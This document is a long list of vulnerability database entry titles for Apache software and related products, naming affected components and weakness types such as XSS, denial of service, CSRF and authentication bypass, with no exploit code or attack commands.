| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
| [93144] Apache Solr Admin Command Execution CSRF
| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
| [92748] Apache CloudStack VM Console Access Restriction Bypass
| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
| [92706] Apache ActiveMQ Debug Log Rendering XSS
| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
| [92270] Apache Tomcat Unspecified CSRF
| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
| [86901] Apache Tomcat Error Message Path Disclosure
| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
| [85430] Apache mod_pagespeed Module Unspecified XSS
| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
| [85249] Apache Wicket Unspecified XSS
| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
| [83339] Apache Roller Blogger Roll Unspecified XSS
| [83270] Apache Roller Unspecified Admin Action CSRF
| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
| [80300] Apache Wicket wicket:pageMapName Parameter XSS
| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
| [78331] Apache Tomcat Request Object Recycling Information Disclosure
| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
| [77593] Apache Struts Conversion Error OGNL Expression Injection
| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
| [71557] Apache Tomcat HTML Manager Multiple XSS
| [71075] Apache Archiva User Management Page XSS
| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
| [70924] Apache Continuum Multiple Admin Function CSRF
| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
| [69520] Apache Archiva Administrator Credential Manipulation CSRF
| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
| [65054] Apache ActiveMQ Jetty Error Handler XSS
| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
| [63895] Apache HTTP Server mod_headers Unspecified Issue
| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
| [63140] Apache Thrift Service Malformed Data Remote DoS
| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
| [60232] PHP on Apache php.exe Direct Request Remote DoS
| [60176] Apache Tomcat Windows Installer Admin Default Password
| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
| [59944] Apache Hadoop jobhistory.jsp XSS
| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
11931| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
11932| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
11933| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
11934| [59019] Apache mod_python Cookie Salting Weakness
11935| [59018] Apache Harmony Error Message Handling Overflow
11936| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
11937| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
11938| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
11939| [59010] Apache Solr get-file.jsp XSS
11940| [59009] Apache Solr action.jsp XSS
11941| [59008] Apache Solr analysis.jsp XSS
11942| [59007] Apache Solr schema.jsp Multiple Parameter XSS
11943| [59006] Apache Beehive select / checkbox Tag XSS
11944| [59005] Apache Beehive jpfScopeID Global Parameter XSS
11945| [59004] Apache Beehive Error Message XSS
11946| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
11947| [59002] Apache Jetspeed default-page.psml URI XSS
11948| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
11949| [59000] Apache CXF Unsigned Message Policy Bypass
11950| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
11951| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
11952| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
11953| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
11954| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
11955| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
11956| [58993] Apache Hadoop browseBlock.jsp XSS
11957| [58991] Apache Hadoop browseDirectory.jsp XSS
11958| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
11959| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
11960| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
11961| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
11962| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
11963| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
11964| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
11965| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
11966| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
11967| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
11968| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
11969| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
11970| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
11971| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
11972| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
11973| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
11974| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
| [58805] Apache Derby Unauthenticated Database / Admin Access
| [58804] Apache Wicket Header Contribution Unspecified Issue
| [58803] Apache Wicket Session Fixation
| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
